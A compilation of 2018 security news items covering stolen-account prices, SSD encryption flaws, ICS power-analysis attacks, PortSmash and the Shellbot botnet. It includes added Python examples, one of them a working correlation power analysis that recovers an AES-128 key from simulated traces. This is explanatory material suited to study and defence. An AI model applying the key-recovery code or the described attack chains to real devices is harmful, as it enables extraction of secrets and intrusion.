When you click on the link you go through several websites redirecting you in a chain. This chain does a lot of things, such as place cookies in your browser, enumerate your settings such as location, browser version and type and probably a lot more. This is done so that when you end up at the landing page they know which page to serve you. In my case, I came from a Swedish IP and the website I was offered was obviously in Swedish, which indicates that they are targeting victims globally.

These websites always have statements and quotes from other users. Most of the information used, including profile photos, name and age, is also taken from stolen accounts. The quote itself is obviously fake, but this approach looks very professional.

This particular website was asking for your email to sign up to a website which basically offered you a job. The actual campaign is called the ‘Profit Formula Scam’ and is a binary option auto-trading scam. It’s been covered in the media before, so I won’t go into any detail here.

People are generally very naive when it comes to their online identity, especially when it comes to services that don’t appear to affect their privacy in any way. I often hear people say that they don’t care if someone gets access to their account, for example, because they assume that the worst thing that can happen is that their account will be shared with someone they don’t know. But we need to understand that even if it all looks very innocent, we don’t know what the criminals do with the money they earn.

What if they are spending it on drugs or guns, which are then sold to teenagers? What if they finance platforms and servers to spread child porn? We need to understand that criminals often work together with other criminals, which means that maybe drugs are bought from the money they make from selling stolen Netflix accounts on the black market.

One of the most alarming things I noticed was how cheap everything was. Just think about the information someone could gather about you if they got access to your Facebook account – there is surely no way you would be okay with someone selling access to parts of your private life for one dollar.

But people use more than just Facebook. I would assume that most people aged between 15 and 35 have registered for over 20 different services and maybe use about 10 of them frequently. The services that you hardly ever use are a problem because you often forget that you even have an account there.

The most frequently used accounts probably include the likes of Facebook, Instagram, Skype, Snapchat, Tinder (or other dating services), email, and entertainment services such as Spotify, Netflix, HBO and YouTube. Besides this, you may have an account on a governmental or financial website such as your bank, insurance company, etc. We also need to remember that some of these services use Google or Facebook for authentication, which means you don’t use an email and password combination – you simply log in with your Facebook or Google account.

Category    What is sold                                                                   Price
Gaming      Any type of gaming account (Steam, PSN, Xbox, etc.)                            $1 per account
Email       Email and password combinations from various leaks, most likely sold in bulk   Various
Facebook    Direct access to a Facebook account                                            $1 per account
Spotify     Spotify Premium account                                                        $2 per account
Netflix     Netflix account                                                                $1-5 per account
Desktop     Username and password for RDP services, including VNC                          $5-50 per account
Server      Username and password for telnet/SSH                                           $5-50 per account
Ecommerce   Access to various ecommerce sites, including Airbnb and similar services       $10 per account

When looking at the data it’s quite mind-blowing that you can basically sell someone’s complete digital life for less than $50. We’re not talking about getting access to bank accounts, but you do get access to services where a credit card might be stored, such as Spotify, Netflix, Facebook and others.

Besides just taking full control of someone’s digital life, access to these services is used by other criminals, for example, to spread malware or conduct phishing attacks.

The level of availability of these hacked or stolen accounts is very impressive; basically anyone with a computer can get access – you don’t have to be an advanced cybercriminal to know where to find them.

Flaws in several self-encrypting SSDs allows attackers to decrypt data they contain
6.11.2018 securityaffairs
Attack  Crypto  Vulnerability

The encryption system implemented by popular solid-state drives (SSDs) is affected by critical vulnerabilities that could be exploited by a local attacker to decrypt data.
The flaws were discovered by researchers Carlo Meijer and Bernard van Gastel at Radboud University in the Netherlands, who found that it is possible to bypass the password-based authentication and access the encrypted data stored on the drives.

The researchers point out that the encryption keys protecting the data are not derived from the owner’s password. An attacker with physical access to the drive can therefore reprogram it through its debug port to accept any password, after which the SSD uses its stored keys to encrypt and decrypt the data as usual.

The attack was successfully tested on three Crucial and four Samsung SSD models; the researchers found that the devices fail to implement the TCG Opal encryption standard correctly.

“We have analyzed the hardware full-disk encryption of several SSDs by reverse engineering their firmware. In theory, the security guarantees offered by hardware encryption are similar to or better than software implementations. In reality, we found that many hardware implementations have critical security weaknesses, for many models allowing for complete recovery of the data without knowledge of any secret.” reads the research paper published by the experts.

“BitLocker, the encryption software built into Microsoft Windows will rely exclusively on hardware full-disk encryption if the SSD advertises support for it. Thus, for these drives, data protected by BitLocker is also compromised.”

Some SSDs fail to cryptographically bind the owner’s password to the actual data encryption key (DEK): both secrets are stored on the drive, and the firmware simply releases the DEK once the correct password has been supplied. An attacker who can reprogram the firmware makes it skip the password check and use the DEK directly.

Experts also discovered that many drives use a single DEK for the entire SSD, even if the vendors declare that the devices use different sections with different passwords.

The experts modified the password-checking routine to accept any password, after which the drive used the DEK to encrypt and decrypt data for them.
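The flaw comes down to where the password sits in the key hierarchy. If it only gates a firmware check, patching that check is enough; if the DEK is wrapped under a key derived from the password, a patched check yields nothing usable. As an added example (not code from the paper or from any drive vendor), the Python below models both designs side by side. The key wrap here is a simplified HMAC-counter stream plus an HMAC tag, standing in for the AES key wrap a real controller would use; the class and method names are invented for the illustration.

```python
import hashlib
import hmac
import os


def derive_kek(password: bytes, salt: bytes) -> bytes:
    """Password -> 32-byte key-encryption key via PBKDF2-HMAC-SHA256 (200k iterations)."""
    return hashlib.pbkdf2_hmac("sha256", password, salt, 200_000, dklen=32)


def keystream(key: bytes, nonce: bytes, length: int) -> bytes:
    """HMAC-SHA256 in counter mode: a toy stream cipher used here only to wrap the DEK.
    A real controller would use AES key wrap (RFC 3394) or AES-GCM instead."""
    out = b""
    counter = 0
    while len(out) < length:
        out += hmac.new(key, nonce + counter.to_bytes(4, "big"), hashlib.sha256).digest()
        counter += 1
    return out[:length]


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


class WeakDrive:
    """The design the paper found on affected drives: the DEK is stored in the clear
    inside the controller and the password only gates a firmware check."""

    def __init__(self, password: bytes):
        self.dek = os.urandom(32)                       # stored unwrapped
        self.salt = os.urandom(16)
        self.pw_hash = hashlib.sha256(self.salt + password).digest()

    def unlock(self, password: bytes):
        if not hmac.compare_digest(hashlib.sha256(self.salt + password).digest(), self.pw_hash):
            return None
        return self.dek

    def unlock_with_patched_check(self):
        # What the researchers did: patch the check to always succeed. The DEK is right there.
        return self.dek


class BoundDrive:
    """DEK wrapped under a KEK derived from the password. The controller stores only
    the salt, nonce, wrapped DEK and an integrity tag, never the DEK itself."""

    def __init__(self, password: bytes):
        dek = os.urandom(32)
        self.salt = os.urandom(16)
        self.nonce = os.urandom(16)
        kek = derive_kek(password, self.salt)
        self.wrapped = xor(dek, keystream(kek, self.nonce, 32))
        # Encrypt-then-MAC over nonce and wrapped key, so a wrong password is detected.
        self.tag = hmac.new(kek, self.nonce + self.wrapped, hashlib.sha256).digest()

    def unlock(self, password: bytes):
        kek = derive_kek(password, self.salt)
        expected = hmac.new(kek, self.nonce + self.wrapped, hashlib.sha256).digest()
        if not hmac.compare_digest(expected, self.tag):
            return None
        return xor(self.wrapped, keystream(kek, self.nonce, 32))

    def unlock_with_patched_check(self, guess: bytes = b""):
        # Skipping the tag check gains nothing: unwrapping under the wrong KEK yields garbage.
        kek = derive_kek(guess, self.salt)
        return xor(self.wrapped, keystream(kek, self.nonce, 32))


if __name__ == "__main__":
    pw = b"correct horse battery staple"
    weak, bound = WeakDrive(pw), BoundDrive(pw)
    print("weak drive, patched check recovers DEK:",
          weak.unlock_with_patched_check() == weak.unlock(pw))
    print("bound drive, patched check recovers DEK:",
          bound.unlock_with_patched_check() == bound.unlock(pw))
```

The same property is what a host-side full-disk encryption layer provides by construction: the key material that matters never exists on the drive until the user has supplied the password.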

With some SSD models the experts retrieved the keys by modifying the firmware; in other cases they obtained the key by exploiting a code injection vulnerability in the password routine.

The following table from the paper summarizes the results of the tests on the Crucial and Samsung SSDs.
[Table: SSD test results]

“The analysis uncovers a pattern of critical issues across vendors. For multiple models, it is possible to bypass the encryption entirely, allowing for a complete recovery of the data without any knowledge of passwords or keys.” continues the paper.

“The situation is worsened by the delegation of encryption to the drive if the drive supports TCG Opal, as done by BitLocker. In such case, BitLocker disables the software encryption, relying fully on the hardware implementation. As this is the default policy, many BitLocker users are unintentionally using hardware encryption, exposing them to the same threats.”

The researchers recommend keeping the decryption key off the drive altogether: the host runs full-disk encryption software that encrypts data before it is written to the drive and decrypts it after it is read, using a key derived from a password supplied by the user.

“The results presented in this paper show that one should not rely solely on hardware encryption as offered by SSDs for confidentiality,” the paper concluded.

“We recommend users that depend on hardware encryption implemented in SSDs to employ also a software full-disk encryption solution, preferably an open-source and audited one.”

The security duo suggests using VeraCrypt that allows for in-place encryption while the operating system is running, the encryption software can also coexist with hardware encryption.

“In particular, VeraCrypt allows for in-place encryption while the operating system is running, and can coexist with hardware encryption,” they said. “Furthermore, BitLocker users can change their preference to enforce software encryption even if hardware encryption is supported by adjusting the Group Policy setting.”

Let me suggest reading the research paper, it is very interesting.

IBM Watson will be used by NIST to assign CVSS scores to vulnerabilities
6.11.2018 securityaffairs

The National Institute of Standards and Technology (NIST) is planning to use Artificial Intelligence to assign the CVSS scores to reported vulnerabilities.
The Common Vulnerabilities and Exposures (CVE) system provides a reference-method for publicly known information-security vulnerabilities and exposures.

Each flaw is assigned a Common Vulnerability Scoring System (CVSS) score between 0.0 and 10.0 according to its severity. The numerical score maps to a qualitative rating (Low, Medium, High or Critical) that helps organizations assess and prioritize the issue.

The NIST will use IBM’s Watson to automatically evaluate the level of severity for each reported vulnerability and assign a proper severity score.

The CVSS score depends on some factors such as the complexity of the attack for the exploitation of the flaw, the effect of the attack on confidentiality, integrity, and availability of the target system, the size of the audience impacted, whether the attack requires the user’s interaction, and whether the flaw could be exploited remotely.

Currently, CVSS scores are assigned by NIST analysts, but the organization believes that introducing AI could speed up the process and make it more efficient.


According to Matthew Scholl, chief of the National Institute of Standards and Technology’s computer security division, the AI will replace human analysts by October 2019.

An analyst takes 5 to 10 minutes to score a simple vulnerability, but far longer for complex ones. Scholl pointed out that the number of publicly disclosed vulnerabilities grows with each passing year.

“Earlier this year, NIST launched a pilot program using IBM’s Watson artificial intelligence system to pore through hundreds of thousands of historical CVSS scores from the institute’s human analysts, Scholl said.” reported NextGov.

Watson used the data to build its experience and use it to assign scores to new vulnerabilities.

“We started it just to get familiar with AI, so we could get our hands on it, learn about it, kind of put it in a lab and experiment,” Scholl said. “As we were doing it with this dataset we said: ‘Hey, this seems to be putting out results the same as our analysts are putting out.’”

The scores assigned by Watson matched the analysts’ for uncomplicated flaws and for vulnerabilities closely resembling previously reported ones.

“The Watson system is great at assigning scores for vulnerabilities where there’s a long paper trail of human-assigned scores for highly similar vulnerabilities. In those cases, the Watson score will be within the small range of variance between what two different human analysts would assign, say 7.2 versus 7.3 on a 10-point scale, Scholl said.” continues the NextGov.

“When the vulnerability is new and complex or highly novel, like the Spectre vulnerability discovered in 2017, Watson fares far worse, Scholl said. In those cases, a human analyst will take over.”

IBM Watson also reports a confidence percentage with each CVSS score; when it falls below a set threshold, the vulnerability is routed to a human analyst.

NIST is also looking into using the technology in other areas of its work.

U.S. Air Force Announces Third Bug Bounty Program
6.11.2018 securityweek

The United States Air Force on Monday announced that it has launched its third bug bounty program in collaboration with HackerOne.

Hack the Air Force 3.0 is the largest bug bounty program run by the U.S. government to date, spanning 191 countries and lasting more than four weeks.

The program started on October 19 and it will end no later than November 22. Up to 600 researchers who have registered will be invited to find vulnerabilities in Department of Defense applications that were recently migrated to a cloud environment owned by the Air Force.

Roughly 70 percent of the participants will be selected based on their HackerOne reputation score and the rest will be picked randomly.

The Pentagon claims it’s offering “competitive bounty awards,” with a minimum payout of $5,000 for critical vulnerabilities.

“Hack the AF 3.0 demonstrates the Air Force’s willingness to fix vulnerabilities that present critical risks to the network,” said Wanda Jones-Heath, Air Force chief information security officer.

The first Hack the Air Force generated over 200 valid vulnerability reports, which earned researchers more than $130,000. In the second installment, the DoD paid out over $100,000 for 106 vulnerabilities discovered by 27 white hat hackers.

Last month, the DoD announced that the Hack the Marine Corps bug bounty program resulted in payouts totaling more than $150,000 for nearly 150 unique flaws.

The DoD recently informed bug bounty hunters that its “Hack the Pentagon” program will run all year long and will target the organization’s high-value assets. This initiative is powered by crowdsourced security platform Bugcrowd.

ICS Devices Vulnerable to Side-Channel Attacks: Researcher
6.11.2018 securityweek

Side-channel attacks can pose a serious threat to industrial control systems (ICS), a researcher warned last month at SecurityWeek’s ICS Cyber Security Conference in Atlanta, GA.

Demos Andreou, a lead engineer at power management company Eaton, has conducted an analysis of protection devices typically used in the energy sector, specifically in power distribution stations.

Side-channel attacks can be used to extract data from a system based on information gained by observing its physical implementation. There are several side-channel attack methods, but Andreou’s research looked at timing and power analysis attacks. These rely on the analysis of the time it takes to execute various computations, and the measurable changes in power consumption as the targeted device performs cryptographic operations, respectively.

The researcher says both timing and power analysis attacks can be launched against ICS devices. However, since timing attacks are easier to detect and block, he focused his research on power analysis.

While side-channel attacks have been known for a long time, few research papers describe their impact on industrial systems. It’s worth noting that the notorious Meltdown and Spectre side-channel attacks also affect ICS, but those methods involve only software and they rely on speculative execution, which helps speed up execution in modern CPUs.

Andreou told SecurityWeek in an interview that his goal is to raise awareness of the risks, show that attacks are not just theoretical, and that they could be conducted even with limited resources.

As part of his work at Eaton, Andreou conducts research into compliance and ethical penetration testing of industrial control systems and networks. Andreou and others help Eaton ensure that its products are secure and customer networks are not vulnerable to cyber threats.

Learn More About ICS Attacks at SecurityWeek’s ICS Cyber Security Conference

Power analysis attacks rely on the power consumption changes of semiconductors during clock cycles, the amount of time between two pulses shown by an oscilloscope. The signals form a power profile, which can provide clues on how the data is being processed.

For example, a password can be obtained one character at a time by observing the power profile when a correct character has been entered compared to an incorrect character. An encryption key can also be extracted using the same technique.

Andreou said he conducted successful experiments on protection devices from three major vendors, but he believes products from other companies are affected as well if the microprocessors they use are vulnerable to these types of attacks.

While the tested devices are 5-10 years old, the researcher says newer products likely have the same vulnerabilities, as these types of attacks were until recently only theoretical and it’s unlikely that vendors took measures to mitigate the risks. The availability of open source software and inexpensive hardware have made it much easier to conduct side-channel attacks.

Andreou showed that an attacker who has physical access to protection devices can use an oscilloscope and a specialized hardware device running open source software to obtain an encryption key. The hardware required for such attacks costs roughly $300, the researcher said.

ICS side channel attack diagram

In the case of the analyzed protection devices, an attacker can extract the encryption key and use it to make configuration changes. Since these systems are used to protect the power grid, changing their settings can have serious consequences, Andreou told SecurityWeek.

A malicious actor could cause the system to fail or have it send false data back to its operator. These devices are distributed and they are controlled by a master system. Incorrect readings from one device can have repercussions for a different part of the network.

Furthermore, the researcher explained, an attacker could make configuration changes that are not immediately obvious. For instance, some of the analyzed protection devices have different settings for different seasons and a hacker could ensure that the changes they make would only go into effect when a certain season starts, which would disguise the attack.

Power analysis attacks can pose a serious threat because they are practically impossible to detect, as an attacked device could seemingly continue performing its normal operations even after it has been compromised, the researcher explained.

Conducting such attacks in a real-world scenario is not an easy task, but it’s not impossible. Andreou pointed out that it may not be difficult to obtain physical access to such devices as they are often left unsupervised. Malicious insiders, consultants, and repair centers could have plenty of opportunities to launch an attack.

On the other hand, the attack must be launched — i.e., the power consumption must be measured — exactly when the device performs an operation that involves the targeted crypto key. This requires reverse engineering the device and knowing ahead of time what type of product is targeted.

Conducting an attack could take hours, most of which involves physical preparation (e.g., opening the targeted device, connecting sensors). The software part of the attack is much faster and the key can be obtained in a matter of minutes.

For instance, if the Advanced Encryption Standard (AES) is used, the attacker can extract the key one byte at a time. For AES-128, they go through all 256 candidate values (0x00 to 0xFF) for each of the 16 key bytes and compare the measured power profile against what each candidate predicts, so the search is 16 × 256 guesses rather than 2^128.
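The byte-at-a-time recovery just described is correlation power analysis: for each key byte, every one of the 256 guesses predicts the power draw of the first-round S-box output, and the guess whose predictions correlate best with the measured traces is the key byte. As an added example, not code from the researcher’s talk, the Python below simulates the traces with a Hamming-weight leakage model plus Gaussian noise (constructed data, since no real measurements are on the page) and recovers all 16 bytes of a 128-bit key. The leakage model, noise level and the key are assumptions of the illustration; the S-box is generated from the AES field arithmetic rather than typed in.

```python
import random


def _generate_sbox():
    """Build the AES S-box from the GF(2^8) inverse and the affine map (no table to mistype)."""
    sbox = [0] * 256
    p = q = 1
    while True:
        # p = p * 3 and q = q / 3 in GF(2^8); 3 generates the multiplicative group,
        # so (p, q) walks every nonzero element paired with its inverse.
        p = (p ^ (p << 1) ^ (0x1B if p & 0x80 else 0)) & 0xFF
        q ^= q << 1
        q ^= q << 2
        q ^= q << 4
        q &= 0xFF
        if q & 0x80:
            q ^= 0x09
        # Affine transform: q ^ rotl(q,1) ^ rotl(q,2) ^ rotl(q,3) ^ rotl(q,4) ^ 0x63
        x = q ^ (q << 1) ^ (q << 2) ^ (q << 3) ^ (q << 4)
        sbox[p] = ((x ^ (x >> 8)) & 0xFF) ^ 0x63
        if p == 1:
            break
    sbox[0] = 0x63
    return sbox


SBOX = _generate_sbox()
HW = [bin(v).count("1") for v in range(256)]   # Hamming-weight lookup


def simulate_traces(key, n_traces, noise_sd=0.5, seed=2018):
    """Constructed leakage: one sample per key byte, HW(SBOX[p ^ k]) plus noise.
    Stands in for the oscilloscope capture around the first-round SubBytes."""
    rng = random.Random(seed)
    plaintexts, traces = [], []
    for _ in range(n_traces):
        pt = bytes(rng.randrange(256) for _ in range(16))
        plaintexts.append(pt)
        traces.append([HW[SBOX[pt[i] ^ key[i]]] + rng.gauss(0, noise_sd) for i in range(16)])
    return plaintexts, traces


def pearson(xs, ys):
    n = len(xs)
    mx, my = sum(xs) / n, sum(ys) / n
    cov = sum((x - mx) * (y - my) for x, y in zip(xs, ys))
    vx = sum((x - mx) ** 2 for x in xs)
    vy = sum((y - my) ** 2 for y in ys)
    return 0.0 if vx == 0 or vy == 0 else cov / (vx * vy) ** 0.5


def recover_key(plaintexts, traces):
    """Correlation power analysis: for each key byte, rank all 256 guesses by how
    well their predicted leakage correlates with the measured samples."""
    key = []
    for i in range(16):
        samples = [t[i] for t in traces]
        best_guess, best_corr = 0, -1.0
        for guess in range(256):
            predicted = [HW[SBOX[pt[i] ^ guess]] for pt in plaintexts]
            c = abs(pearson(predicted, samples))
            if c > best_corr:
                best_guess, best_corr = guess, c
        key.append(best_guess)
    return bytes(key)


if __name__ == "__main__":
    secret = bytes.fromhex("2b7e151628aed2a6abf7158809cf4f3c")  # assumed key for the demo
    pts, trs = simulate_traces(secret, 150)
    print("recovered:", recover_key(pts, trs).hex())
```

With a real device the expensive part is what the article describes: locating the SubBytes window in the trace and aligning the captures; once the samples line up, the statistics above need only a few hundred traces.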

Symantec Acquires Appthority, Javelin Networks
6.11.2018 securityweek

Symantec on Monday announced the acquisition of mobile application security firm Appthority and Active Directory protection company Javelin Networks.

With the acquisition of Appthority, Symantec wants to provide customers the technology needed to analyze mobile applications for malicious capabilities and unwanted behavior, including vulnerabilities, exposure of sensitive data, and privacy risks.

According to Symantec, the technology obtained from Appthority will be built into Symantec Endpoint Protection Mobile (SEP Mobile), which the security firm launched following the acquisition of Skycure last year.

Appthority was a Symantec Ventures portfolio company before the acquisition. The mobile security firm’s employees and technology have now become part of Symantec’s endpoint security business.

“Mobile apps are a critical threat vector that every company must address to protect their enterprise security,” said Adi Sharabani, Sr. Vice President for Modern OS Security at Symantec. “The Appthority technology extends SEP Mobile’s capabilities in limiting unwanted app behaviors, supporting regulatory compliance, and assessing vulnerabilities.”

Employees and technology of Javelin Networks have also joined Symantec’s endpoint security business.

Symantec believes that its acquisition of Javelin technology will protect customers against threats abusing Microsoft’s Active Directory (AD) service. The security firm pointed out that malicious actors, including advanced persistent threats (APTs), have increasingly abused AD for reconnaissance and lateral movement.

Javelin’s AD security solutions are designed to detect misconfigurations and backdoors, and protect commonly used domain resources, such as credentials, controllers and identities.

Symantec has not disclosed financial terms for either of the acquisitions.

Addressing the 3 Million Person Cybersecurity Workforce Gap

6.11.2018 securityweek Cyber

The Biggest Problem is Not in Measuring the Accuracy of the Cybersecurity Skills/Workforce Gap, But in Finding a Way to Close It

(ISC)2's Cybersecurity Workforce Study 2018 claims that cybersecurity professionals are focusing on developing new skills as the workforce gap widens. According to the recently released report, that gap now stands at more than 2.9 million workers globally -- with 2.14 million cybersecurity staff required in the Asia-Pacific region, and almost half a million required in North America.

The figures come from what (ISC)2 calls a 'more holistic approach to measuring the gap'. Rather than simply subtracting supply from demand, this new calculation "takes other critical factors into consideration, including the percentage of organizations with open positions and the estimated growth of companies of different sizes."

Whether this makes it any more scientific than other attempts to measure the cybersecurity workforce and skills gap is still questionable. (ISC)2 questioned 1,500 people around the world working on security. It therefore has its own built-in bias -- most people, in any profession, will consider themselves overworked and capable of doing better with an expanded team. The same argument applies to budgetary concerns -- most people would like a bigger budget, regardless of profession.

Despite these concerns, the figures generated (PDF) are interesting. Fifty-nine percent of respondents claim their organization is at extreme or moderate risk due to a cybersecurity staff shortage.

Sixty percent said their budget should be much or at least slightly higher than it is.

However, regardless of any concerns over any potential biased inflation, nobody doubts that there is a workforce gap, and that most companies should pay at least more attention and possibly more money to cybersecurity. The biggest problem is not in measuring the accuracy of the skills/workforce gap, but in finding a way to close it.

Some experts believe the solution must be found in the education system. There is, says David Emm, principal security researcher at Kaspersky Lab, a "lack of interest in the sector from the future generation. Our education system and the industry itself are not inspiring young people's interests and talent in the field of cybersecurity -- we need to be encouraging people into the industry. It's increasingly important to equip children with cybersecurity skills at an early age to give them an idea of what cyber roles entail, and foster these skills."

Kaspersky Lab has its own interesting figures on the young. Only half (50%) of under-25s say they would join the fight against cybercrime; but 17% would use their skills for fun, 18% would use them for 'secretive activities', and 16% would use them for financial gain.

Other security experts believe that the solution must come from the industry itself. "Filling the skill shortage will require organizations to change their attitude and approach to hiring, training, and participating in collaborative pipeline development efforts," says Steve Durbin, managing director of the Information Security Forum. His view is that the solution must come from within the industry.

"Organizations," he says, "need to establish a series of strategic objectives that lay a foundation for a stronger workforce and more robust pipeline. With clear direction and sustained HR efforts, organizations can formalize the structure of the security workforce, harness the appropriate talent, and bring security teams into better alignment with the organization's security objectives."

Dr. Bret Fund, Founder and CEO at SecureSet, agrees. "Organizations need to build sustainable recruiting practices as well as develop and retain the talent they already have to boost the organization's cyber resilience."

But there is a growing school of thought that suggests that the solution is in reversing the argument. The problem is not so much that we don't have enough bodies for the work required, but that we have too much work for the bodies available. This argument suggests that technology -- or more specifically, AI-enabled automation -- should be used to reduce the workload.

One such proponent is Chris Morales, head of security analytics at Vectra. "A greater use of AI technology can make a considerable contribution to bridging the cyber skills and resource gap that the latest (ISC)2 report identifies," he says. "AI augments the human capabilities to work at a scale and speed manual approaches simply can't touch; and with 'lack of time' as one of the top job concerns being cited from IT and security professionals this would be invaluable."

He is concerned that existing approaches to filling the workforce and skills gap are inefficient. "There is still the assumption," he added, "that certain qualifications such as computing, and mathematics are essential for working in cyber security. In fact, lots of employers still ask for (ISC)2 style certification. Yet, this doesn't need to be the case and is only unnecessarily compounding the problem of a lack of new staff in this area."

This assumption is confirmed in the (ISC)2 report. Among the respondents, the most important qualification for employment (49%) is considered to be 'relevant cybersecurity work experience'. Not far behind (40%) is 'extensive cybersecurity work experience'. Cybersecurity certification is the third most required attribute at 43%, with general purpose proof of aptitude and intelligence ('a cybersecurity or related undergraduate degree') languishing at the bottom of the table with just 20%.

For so long as organizations insist on recruiting only experienced staff with existing security certifications, they're cutting off the supply of potential talent from the education system -- and inevitably compounding the problem. Aptitude should perhaps be the primary recruitment requirement, with extensive 'on the job' training to follow.

(ISC)2 seems to recognize this. The report concludes, "Companies who employ new recruits should explore options available for training them for the job and setting them up for success. They also need to provide more professional development opportunities for the people who already work in cybersecurity -- and allow sufficient time for their staff to pursue them."

Thoma Bravo Buys Veracode From Broadcom for $950 Million

6.11.2018 securityweek IT

Private equity investment firm Thoma Bravo on Monday announced that it has entered an agreement to acquire application security testing company Veracode from Broadcom.

Thoma Bravo is prepared to pay $950 million in cash, with the transaction expected to close in the fourth quarter of 2018.

The investment firm says it will support Veracode’s operational and product development plans. Sam King, current senior vice president and general manager of Veracode, will become the CEO of Veracode once the acquisition is completed.

Veracode offers an application security testing platform that helps developers and security teams find and fix vulnerabilities in the software they use, including their own and third-party applications. The company claims to have over 2,000 customers, including nearly one-third of Fortune 100 firms and more than 20 of the Forbes 100 Most Valuable Brands.

“Partnering with Thoma Bravo, a proven security software investor, is expected to extend our market reach and further fuel our innovation so that we can offer the broadest software security platform and empower us to accelerate growth — all to allow us to transform the way companies achieve their software security goals,” King said.

Broadcom sold Veracode just as it completed the acquisition of CA Technologies, for which it paid nearly $19 billion. CA Technologies bought Veracode for $614 million in cash in 2017.

Now that the acquisition has been completed, CA will operate as a wholly owned subsidiary of Broadcom and its common stock will no longer be traded on NASDAQ.

Thoma Bravo has acquired more than 30 enterprise security companies over the past years, including SailPoint, Barracuda Networks, Imperva, Crossbeam Systems, Centrify, LogRhythm, and Imprivata.

New Side-Channel Vulnerability Leaks Sensitive Data From Intel Chips

6.11.2018 securityweek Vulnerebility

A newly revealed side-channel attack can leak encrypted data from Intel microprocessors that use a Simultaneous Multithreading (SMT) architecture.

Dubbed PortSmash and tracked as CVE-2018-5407, the vulnerability affects all CPUs that rely on SMT, including Intel’s Hyper-Threading architectures. By exploiting the vulnerability, an attacker could extract sensitive data such as encryption keys from a computer’s memory or processor.

The issue was discovered by researchers at Tampere University of Technology in Finland, and Universidad Tecnológica de la Habana (CUJAE) in Cuba. By exploiting the vulnerability, they were able to steal an OpenSSL P-384 private key from a TLS server.

As Billy Brumley from the Tampere University of Technology explains, the bug can be categorized as information disclosure through timing discrepancy and exists due to execution engine sharing on SMT.

The SMT technology makes it possible for multiple threads to be executed simultaneously on a CPU core. Because of this, however, malicious code could snoop into the code running on the other thread on the same core, even if it belongs to a cryptographic application, which would normally include protections against side-channel assaults.

“We detect port contention to construct a timing side channel to exfiltrate information from processes running in parallel on the same physical core,” he says.

For the attack to be successful, the malicious process needs to run on the same physical core as the victim process.

The vulnerability has been verified on Intel's Skylake and Kaby Lake processors, and experts believe that chips from other manufacturers such as AMD could also be vulnerable. Proof-of-concept (PoC) code for Intel chips has already been published. The code was designed to measure timing discrepancies and discover and exfiltrate protected data from the victim process.

“This exploit code should work out of the box on Skylake and Kaby Lake. For other SMT architectures, customizing the strategies and/or waiting times in spy is likely needed,” the researcher notes.

Brumley underlines the fact that this is a hardware issue that has nothing to do with the memory subsystem or caching. He also points out that any “software that has secret dependent control flow at any granularity” is impacted.

By abusing the new type of attack, an actor could steal “generated keys and decrypt any conversation that would otherwise have been protected by the key,” Justin Jett, Director of Audit and Compliance for Plixer, told SecurityWeek in an email.

“Additionally, because the malware writer is already on the machine, they have a better understanding of where these keys may be used (for example, were the keys then moved to a specific folder that is being used by an application installed on the machine),” Jett continued.

To mitigate impact, one would need to disable SMT/Hyper-Threading in the BIOS setup. However, the option might not be available in many systems, as OpenBSD’s Mark Kettenis points out.

The vulnerability was reportedly submitted to Intel in early October. PortSmash, however, does not appear related to recently discovered attacks that rely on speculative execution, such as Spectre and Meltdown. It has nothing in common with Foreshadow/L1 Terminal Fault (L1TF) either.

“PortSmash, and all the other processor vulnerabilities like Meltdown and Spectre, is a reminder that we have to rotate the keys and certificates that serve as machine identities, much more frequently than we do," Kevin Bocek, chief cybersecurity officer at Venafi, told SecurityWeek. "Our machine identities are kept around for years, and it’s crazy to think that they won’t be attacked. This is especially true in cloud and microservices environments, where these kinds of vulnerabilities are most dangerous."

"The reality is that most keys and certificates aren’t changed often, and a surprising number are never changed," Bocek added. "These are the machine identities that are most at risk from PortSmash."

In February 2018, Intel announced that it would offer up to $250,000 for valid side-channel exploits reported through its bug bounty program.

Iran Accuses Israel of Failed Cyber Attack
6.11.2018 securityweek

Iran accused Israel on Monday of launching a failed cyber attack against its communications systems.

"A regime whose record in using cyber weapons is clear from cases such as Stuxnet has tried this time to damage Iran's communication infrastructure," said Information Minister Mohammad Javad Azari Jahromi on his Twitter account.

He was referring to the Stuxnet virus, discovered in 2010 and believed to have been engineered by Israel and the United States, which damaged nuclear facilities in Iran.

"Thanks to vigilance of the technical teams, they returned empty-handed. We will follow up this hostile action through international forums," Jahromi said.

His deputy, Hamid Fattahi, said technical teams had intercepted multiple attempts to infiltrate their systems early on Monday, and had been "strongly warded off".

Shellbot Botnet Targets IoT devices and Linux servers
6.11.2018 securityaffairs
BotNet  IoT

Security experts at Trend Micro have spotted an IRC bot dubbed Shellbot that was built using Perl Shellbot.
The malware was distributed by a threat group called Outlaw; it was able to target Linux and Android devices, and also Windows systems.

“We uncovered an operation of a hacking group, which we’re naming “Outlaw” (translation derived from the Romanian word haiduc, the hacking tool the group primarily uses), involving the use of an IRC bot built with the help of Perl Shellbot.” reads the analysis published by TrendMicro.

“The group distributes the bot by exploiting a common command injection vulnerability on internet of things (IoT) devices and Linux servers. Further research indicates that the threat can also affect Windows-based environments and even Android devices.”


In recent attacks, hackers compromised FTP servers of a Japanese art institution and a Bangladeshi government site. The attackers linked compromised servers to a high availability cluster to host an IRC bouncer and control the botnet.

The bot was previously distributed via an exploit targeting the ShellShock flaw; in October, experts from IBM observed the bot being spread through the Drupalgeddon2 vulnerability.

In the last series of attacks analyzed by Trend Micro, threat actors leveraged previously brute-forced or compromised hosts to distribute the threat and target Ubuntu and Android devices.

The analysis of command and control (C&C) traffic allowed the security researchers to find the IRC channels’ information and discover that, at the time of the first infection, 142 hosts were present in the IRC channel.

The Shellbot backdoor is controlled by the IRC channel’s administrator, who can instruct it to perform various activities, including port scans, several types of distributed denial of service (DDoS), file downloads, and gathering information about the infected system.

The attack chain starts with the malware running a command on the target to verify that it accepts commands from the command-line interface (CLI). The malicious code changes the working directory to “/tmp”, downloads a payload and runs it with the Perl interpreter. The payload is removed in the final step, so no trace remains on the attacked system.

“During the traffic monitoring, several identities such as luci, lucian, dragos, mazy, hydra, and poseidon were spotted in IRC communication channels.”

“These identities were also found as usernames on a compromised Japanese server. This server seemed to have a certain importance as it was also used to distribute an early version of this N3-Shellbot.”

Researchers were able to download the files that the threat actors used. Using the credentials from one of the commands injected into the honeypots, the experts noticed that the files’ contents often changed on the server, and that modification, deletion and addition of files mostly happened during daytime in Central European Time (CET).

Further details were reported in the analysis published by TrendMicro.

Google dorks were the root cause of a catastrophic compromise of CIA’s communications
6.11.2018 securityaffairs

Google queries allowed the Iranian government to dismantle the CIA communication network used by its agents and kill dozens of spies.
